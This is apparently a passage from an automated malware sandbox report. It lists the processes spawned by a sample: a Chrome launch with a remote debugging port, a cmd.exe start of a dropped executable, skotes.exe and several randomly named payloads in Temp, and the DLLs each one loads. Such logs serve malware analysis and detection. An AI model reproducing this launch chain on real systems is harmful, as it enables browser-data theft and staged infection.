Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2140,i,7468167225863871419,6688066973538653544,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsIIEBKJECFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsIIEBKJECFC.exe "C:\Users\user\DocumentsIIEBKJECFC.exe"
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe "C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe "C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe "C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe "C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe "C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe"
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process created: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe "C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe "C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe"
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process created: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe "C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe "C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe "C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe "C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe"
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process created: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe "C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsIIEBKJECFC.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2140,i,7468167225863871419,6688066973538653544,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsIIEBKJECFC.exe "C:\Users\user\DocumentsIIEBKJECFC.exe" Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe "C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe "C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe "C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process created: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe "C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe"
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process created: C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe "C:\Users\user\AppData\Local\Temp\Q10LTOCEFP0KA6N46594D.exe"
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Process created: C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe "C:\Users\user\AppData\Local\Temp\TMZOGPKAQROXKZACD6GWC5N6Z.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Section loaded: kernel.appcore.dll
